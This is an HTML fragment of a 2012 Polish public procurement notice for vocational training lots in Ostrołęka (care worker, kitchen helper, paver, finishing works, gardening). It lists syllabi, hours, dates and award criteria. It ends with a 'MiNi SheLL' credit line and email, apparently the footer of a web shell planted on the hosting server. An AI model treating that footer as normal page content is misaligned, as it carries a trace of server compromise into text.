<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 08.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Posiadanie przez instytucję certyfikatu jakości usług - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Szkolenie - opiekun środowiskowy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Celem szkolenia jest nabycie wiedzy i umiejętności niezbędnych do świadczenia usług opiekuńczych dla osób w podeszłym wieku, chorych, niepełnosprawnych.
Program szkolenia oraz materiały dydaktyczne powinny być opracowane zgodnie z obowiązującymi w tym zakresie przepisami prawa oraz uwzględniać następujące zagadnienia:
1) kompleksowa opieka nad osobami starszymi, niepełnosprawnymi,
2) zasady etyki zawodowej,
3) zasady higieny osobistej,
4) wybrane zagadnienia z metodyki pracy z osobami niepełnosprawnymi,
5) udzielanie pierwszej pomocy,
6) psychologia opieki nad podopiecznymi,
7) choroby wieku starczego,
8) zasady żywienia osób przewlekle chorych,
9) elementy rehabilitacji,
10) zajęcia praktyczne z osobami starszymi i niepełnosprawnymi.
Szkoleniem objętych będzie ogółem 19 osób.
Termin realizacji zamówienia: 02-26 października 2012 r.
Liczba godzin szkolenia powinna obejmować minimum 140 godzin edukacyjnych (przez godzinę edukacyjną należy rozumieć 45 minut zajęć) i powinna zawierać zakres wiadomości teoretycznych i umiejętności praktycznych - liczba godzin trwania szkolenia ma przypadać na każdą uczestniczkę/uczestnika szkolenia.
Zajęcia powinny odbywać się od poniedziałku do piątku, za wyjątkiem dni świątecznych, w przedziale czasowym od 8:00 do 18:00. 
Dzienna liczba godzin szkolenia nie może przekroczyć 8 godzin edukacyjnych.
Miejsce szkolenia: miasto Ostrołęka.
Szkolenie powinno być zakończone egzaminem wewnętrznym, wydaniem zaświadczenia o ukończeniu szkolenia i uzyskanych kwalifikacjach.
Przed rozpoczęciem szkolenia Wykonawca skieruje na swój koszt osoby, które będą brać udział w szkoleniu do lekarza medycyny pracy, w celu wydania zaświadczenia o braku przeciwwskazań do wykonywania zawodu  oraz orzeczenia o braku przeciwwskazań zdrowotnych zgodnie z ustawą z dnia 5 grudnia 2008 r. o zapobieganiu oraz zwalczaniu zakażeń  i chorób zakaźnych u ludzi (Dz.U. z 2008r. Nr 234, poz. 1570 z późn. zm.).
Wykonawca zapewni uczestniczkom/uczestnikom szkolenia odzież i obuwie robocze.
Wykonawca zapewni uczestniczkom/uczestnikom szkolenia napoje (m.in. kawę, herbatę, wodę mineralną), wyroby cukiernicze oraz obiad..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 02.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Posiadanie przez instytucję certyfikatu jakości usług - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Szkolenie - pomoc kuchenna z minimum sanitarnym.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Celem szkolenia jest nabycie wiedzy i umiejętności niezbędnych do podjęcia zatrudnienia w zakładzie gastronomicznym.
Program szkolenia oraz materiały dydaktyczne powinny być opracowane zgodnie z obowiązującymi w tym zakresie przepisami prawa oraz uwzględniać następujące zagadnienia:
1) minimum sanitarne
2) obowiązki pomocy kuchennej,
3) elementy etyki zawodowej,
4) obsługa klienta,
5) podstawowe zasady bezpieczeństwa i higieny pracy,
6) obróbka artykułów spożywczych,
7) przygotowywanie półproduktów,
8) obsługa maszyn i urządzeń kuchennych,
9) czynności porządkowe,
10) zajęcia praktyczne. 
Szkoleniem objętych zostanie ogółem 13 osób.
Termin realizacji zamówienia: 22 października - 15 listopada 2012 r.
Liczba godzin szkolenia powinna obejmować minimum 115 godzin edukacyjnych (przez godzinę edukacyjną należy rozumieć 45 minut zajęć) i powinna zawierać zakres wiadomości teoretycznych i umiejętności praktycznych - liczba godzin trwania szkolenia ma przypadać na każdą uczestniczkę/uczestnika szkolenia.
Zajęcia powinny odbywać się od poniedziałku do piątku, za wyjątkiem dni świątecznych, w przedziale czasowym od 8:00 do 18:00. 
Dzienna liczba godzin szkolenia nie może przekroczyć 8 godzin edukacyjnych.
Miejsce szkolenia: miasto Ostrołęka.
Szkolenie powinno być zakończone egzaminem wewnętrznym, wydaniem zaświadczenia o ukończeniu szkolenia i uzyskanych kwalifikacjach.
Przed rozpoczęciem szkolenia Wykonawca skieruje na swój koszt osoby, które będą brać udział w szkoleniu do lekarza medycyny pracy, w celu wydania zaświadczenia o braku przeciwwskazań do wykonywania zawodu  oraz orzeczenia o braku przeciwwskazań zdrowotnych zgodnie z ustawą z dnia 5 grudnia 2008 r. o zapobieganiu oraz zwalczaniu zakażeń  i chorób zakaźnych u ludzi (Dz.U. z 2008r. Nr 234, poz. 1570 z późn. zm.).
Wykonawca zapewni uczestniczkom/uczestnikom szkolenia odzież i obuwie robocze.
Wykonawca zapewni uczestniczkom/uczestnikom szkolenia napoje (m.in. kawę, herbatę, wodę mineralną), wyroby cukiernicze oraz obiad..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 22.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Posiadanie przez instytucję certyfikatu jakości usług - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Szkolenie - brukarz.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Celem szkolenia jest teoretyczne i praktyczne przygotowanie uczestników do wykonywania pracy w zawodzie brukarza.
Program szkolenia oraz materiały dydaktyczne powinny być opracowane zgodnie z obowiązującymi w tym zakresie przepisami prawa oraz uwzględniać następujące zagadnienia:
1) bezpieczeństwo i higiena pracy,
2) podstawowe wiadomości o robotach ziemnych,
3) podstawowe wiadomości z zakresu materiałoznawstwa,
4) rozróżnianie i cechy techniczne materiałów do robót brukarskich,
5) rozróżnianie i posługiwanie się narzędziami i sprzętem,
6) techniki wykonywania robót brukarskich,
7) ocena stanu technicznego nawierzchni brukowych - prace naprawcze,
8) zajęcia praktyczne.
Szkoleniem objętych będzie ogółem 5 osób.
Termin realizacji zamówienia: 03 września 2012 r. - 28 września 2012 r.
Liczba godzin szkolenia powinna obejmować minimum 150 godzin edukacyjnych (przez godzinę edukacyjną należy rozumieć 45 minut zajęć) i powinna zawierać zakres wiadomości teoretycznych i umiejętności praktycznych - liczba godzin trwania szkolenia ma przypadać na każdą uczestniczkę/uczestnika szkolenia.
Zajęcia powinny odbywać się od poniedziałku do piątku, za wyjątkiem dni świątecznych, w przedziale czasowym od 8:00 do 18:00. 
Dzienna liczba godzin szkolenia nie może przekroczyć 8 godzin edukacyjnych.
Miejsce szkolenia: miasto Ostrołęka.
Szkolenie powinno być zakończone egzaminem wewnętrznym, wydaniem zaświadczenia o ukończeniu szkolenia i uzyskanych kwalifikacjach.
Przed rozpoczęciem szkolenia Wykonawca skieruje na swój koszt osoby, które będą brać udział w szkoleniu do lekarza medycyny pracy, w celu wydania zaświadczenia o braku przeciwwskazań do wykonywania zawodu.  
Wykonawca zapewni uczestniczkom/uczestnikom szkolenia odzież i obuwie robocze.
Wykonawca zapewni uczestniczkom/uczestnikom szkolenia napoje (m.in. kawę, herbatę, wodę mineralną), wyroby cukiernicze oraz obiad..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 03.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Posiadanie przez instytucję certyfikatu jakości usług - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Szkolenie - technolog robót wykończeniowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Celem szkolenia jest teoretyczne i praktyczne przygotowanie uczestników do wykonywania robót wykończeniowych w budownictwie.
Program szkolenia oraz materiały dydaktyczne powinny być opracowane zgodnie z obowiązującymi w tym zakresie przepisami prawa oraz uwzględniać następujące zagadnienia:
1) bezpieczeństwo i higiena pracy w budownictwie,
2) materiałoznawstwo - ocena przydatności materiałów i ich przechowywanie,
3) dokumentacja techniczna i rysunek zawodowy,
4) zasady organizacji pracy i obmiaru,
5) technologia robót,
6) technologie wykonywania prac wykończeniowych - zajęcia praktyczne.
Szkoleniem objętych będzie ogółem 5 osób.
Termin realizacji zamówienia: 08 października 2012 r. - 09 listopada 2012 r.
Liczba godzin szkolenia powinna obejmować minimum 150 godzin edukacyjnych (przez godzinę edukacyjną należy rozumieć 45 minut zajęć) i powinna zawierać zakres wiadomości teoretycznych i umiejętności praktycznych - liczba godzin trwania szkolenia ma przypadać na każdą uczestniczkę/uczestnika szkolenia.
Zajęcia powinny odbywać się od poniedziałku do piątku, za wyjątkiem dni świątecznych, w przedziale czasowym od 8:00 do 18:00. 
Dzienna liczba godzin szkolenia nie może przekroczyć 8 godzin edukacyjnych.
Miejsce szkolenia: miasto Ostrołęka.
Szkolenie powinno być zakończone egzaminem wewnętrznym, wydaniem zaświadczenia o ukończeniu szkolenia i uzyskanych kwalifikacjach.
Przed rozpoczęciem szkolenia Wykonawca skieruje na swój koszt osoby, które będą brać udział w szkoleniu do lekarza medycyny pracy, w celu wydania zaświadczenia o braku przeciwwskazań do wykonywania zawodu.  
Wykonawca zapewni uczestniczkom/uczestnikom szkolenia odzież i obuwie robocze.
Wykonawca zapewni uczestniczkom/uczestnikom szkolenia napoje (m.in. kawę, herbatę, wodę mineralną), wyroby cukiernicze oraz obiad..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 08.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Posiadanie przez instytucję certyfikatu jakości usług - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Szkolenie -zakładanie i pielęgnacja ogrodów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Celem szkolenia jest teoretyczne i praktyczne przygotowanie uczestników do wykonywania pracy przy zakładaniu i pielęgnacji ogrodów.
Program szkolenia powinien być opracowany zgodnie z obowiązującymi w tym zakresie przepisami prawa oraz uwzględniać następujące zagadnienia:
1) planowanie i wymiarowanie,
2) projektowanie terenów zielonych,
3) ochrona i pielęgnacja roślin,
4) zasady rozmieszczania roślin w terenach zielonych,
5) zapoznanie z podstawowymi gatunkami roślin i właściwymi odległościami w sadzeniu,
6) przygotowanie terenu i gleby pod sadzenie i uprawę roślin,
7) sadzenie roślin,
8) zakładanie i pielęgnacja rabat, kwietników sezonowych,
9) renowacja i pielęgnacja trawników,
10) pielęgnacja roślinności dentrologicznej,
11) zasady prac porządkowych i przygotowawczych,
12) bezpieczeństwo i higiena pracy w ogrodnictwie,
13) zajęcia praktyczne.
Szkoleniem objętych będzie ogółem 7 osób.
Termin realizacji zamówienia: 03 września 2012 r. - 28 września 2012 r.
Liczba godzin szkolenia powinna obejmować minimum 150 godzin edukacyjnych (przez godzinę edukacyjną należy rozumieć 45 minut zajęć) i powinna zawierać zakres wiadomości teoretycznych i umiejętności praktycznych - liczba godzin trwania szkolenia ma przypadać na każdą uczestniczkę/uczestnika szkolenia.
Zajęcia powinny odbywać się od poniedziałku do piątku, za wyjątkiem dni świątecznych, w przedziale czasowym od 8:00 do 18:00. 
Dzienna liczba godzin szkolenia nie może przekroczyć 8 godzin edukacyjnych.
Miejsce szkolenia: miasto Ostrołęka.
Szkolenie powinno być zakończone egzaminem wewnętrznym, wydaniem zaświadczenia o ukończeniu szkolenia i uzyskanych kwalifikacjach.
Przed rozpoczęciem szkolenia Wykonawca skieruje na swój koszt osoby, które będą brać udział w szkoleniu do lekarza medycyny pracy, w celu wydania zaświadczenia o braku przeciwwskazań do wykonywania zawodu.  
Wykonawca zapewni uczestniczkom/uczestnikom szkolenia odzież i obuwie robocze.
Wykonawca zapewni uczestniczkom/uczestnikom szkolenia napoje (m.in. kawę, herbatę, wodę mineralną), wyroby cukiernicze oraz obiad..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 03.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Posiadanie przez instytucję certyfikatu jakości usług - 20</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com